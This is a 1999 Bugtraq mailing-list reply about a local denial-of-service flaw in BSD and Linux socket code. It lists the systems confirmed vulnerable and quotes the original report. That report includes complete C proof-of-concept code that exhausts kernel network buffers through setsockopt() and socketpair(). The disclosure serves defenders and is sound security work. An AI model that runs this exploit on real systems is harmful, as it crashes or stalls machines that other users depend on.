[11737] in bugtraq
Re: Local DoS on network by unpriviledged user using setsockopt()
daemon@ATHENA.MIT.EDU (John N Dvorak)
Wed Sep 8 08:45:55 1999
Mime-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Message-Id: <Pine.BSI.4.05.9909031028060.6617-100000@hq.capu.net>
Date: Fri, 3 Sep 1999 10:35:43 -0400
Reply-To: John N Dvorak <dvorak@CAPU.NET>
From: John N Dvorak <dvorak@CAPU.NET>
X-To: Sven Berkvens <sven@ILSE.NL>
To: BUGTRAQ@SECURITYFOCUS.COM
In-Reply-To: <19990901133104.A10623@ilse.nl>
Sven,
I have verified the following platforms:
BSDI 2.1
BSDI 3.1
BSDI 4.0
BSDI 4.0.1
Cobalt Linux (MIPS) - RedHat based
All vulnerable.
I am testing on other Linux platforms, but I presume all BSD and
Linux-based systems are affected. I have no resources to test this on
Solaris, AIX, HP and System-V based systems.
I would venture a guess that MacOS X may be vulnerable since I am fairly
sure that most of the socket code is lifted directly from BSD.
JD
On Wed, 1 Sep 1999, Sven Berkvens wrote:
>Recently, I mailed this mailing to a number of people who are concerned
>with security of various OSes, like FreeBSD, OpenBSD and NetBSD. The
>mailing was NOT intended to be made public, but somehow it was. Here is
>my original mailing:
>
>
>--- Forwarded ---
>
>I stumbled across a denial of service attack on FreeBSD systems, where
>an unpriviledged user can panic the kernel. Quick and dirty testing
>(code attached at the end of this mail) showed OpenBSD is vulnerable
>too:
>
>FreeBSD - 3.2-RELEASE: the kernel panics. I haven't had a chance to
>test it on older FreeBSD versions.
>
>OpenBSD 2.4 - GENERIC kernel & OpenBSD 2.5-current with NMBSCLUSTERS=8192:
>The kernel logs one "/bsd: mb_map full" and all processes trying to send
>something over the network get stuck waiting in mbuf. Locally the system
>continues to function. Tested by a friend.
>
>NetBSD: Not available, but it is highly probable that the affected code
>in OpenBSD is from its parent NetBSD.
>
>As far as I'm concerned, this can be handled quietly and without much
>haste. Knowledge of this problem is limited and there is absolutely no
>intention of publishing this exploit or messages to Bugtraq.
>
>With kind regards,
>Sven Berkvens (sven@ilse.nl)
>Long time FreeBSD-system administrator
>
>
>
>The source code for the program that causes this:
>
>#include <unistd.h>
>#include <sys/socket.h>
>#include <fcntl.h>
>
>#define BUFFERSIZE 204800
>
>extern int
>main(void)
>{
> int p[2], i;
> char crap[BUFFERSIZE];
>
> while (1)
> {
> if (socketpair(AF_UNIX, SOCK_STREAM, 0, p) == -1)
> break;
> i = BUFFERSIZE;
> setsockopt(p[0], SOL_SOCKET, SO_RCVBUF, &i, sizeof(int));
> setsockopt(p[0], SOL_SOCKET, SO_SNDBUF, &i, sizeof(int));
> setsockopt(p[1], SOL_SOCKET, SO_RCVBUF, &i, sizeof(int));
> setsockopt(p[1], SOL_SOCKET, SO_SNDBUF, &i, sizeof(int));
> fcntl(p[0], F_SETFL, O_NONBLOCK);
> fcntl(p[1], F_SETFL, O_NONBLOCK);
> write(p[0], crap, BUFFERSIZE);
> write(p[1], crap, BUFFERSIZE);
> }
> exit(0);
>}
>
>----- End forwarded message -----
>
===========================================
John N Dvorak | dvorak@capu.net
Director of Technology
CapuNet, LLC - Corporate Internet Solutions
(301) 881-4900 x8018
===========================================
